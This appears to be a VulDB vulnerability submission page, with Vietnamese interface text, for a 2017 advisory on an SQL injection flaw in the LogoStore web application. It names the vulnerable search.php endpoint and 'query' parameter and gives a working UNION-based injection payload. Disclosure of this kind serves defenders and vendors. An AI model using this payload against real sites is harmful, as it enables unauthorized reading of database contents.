Gửi #18: LogoStore - SQL Injectionthông tin

tiêu đề	LogoStore - SQL Injection
Mô tả	Introduction Exploit Title: LogoStore - SQL Injection Date: 27.01.2017 Software Link: https://codecanyon.net/item/logostore-buy-and-sell-logos-online/19379630 Exploit Author: Kaan KAMIS Contact: iletisim[at]k2an[dot]com Website: http://k2an.com Category: Web Application Exploits Overview LogoStore is a web application that allows you to buy and sell logos online. Manage logos within your account, check others logos and sell your own! Type of vulnerability: An SQL Injection vulnerability in LogoStore allows attackers to read arbitrary data from the database. Vulnerable URL : http://locahost/LogoStore/search.php Mehod : POST Parameter : query Simple Payload: Type: UNION query Payload: query=test' UNION ALL SELECT CONCAT(CONCAT('qqkkq','VnPVWVaYxljWqGpLLbEIyPIHBjjjjASQTnaqfKaV'),'qvvpq'),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- oCrh&search=
Người dùng	KAAN KAMIS (UID 213)
Đệ trình	01/02/2017 12:27 (cách đây 9 những năm)
Kiểm duyệt	03/02/2017 23:15 (2 days later)
Trạng thái	được chấp nhận
Mục VulDB	96540 [LogoStore /LogoStore/search.php truy vấn Tiêm SQL]
điểm	17

Do you know our Splunk app?

Download it now for free!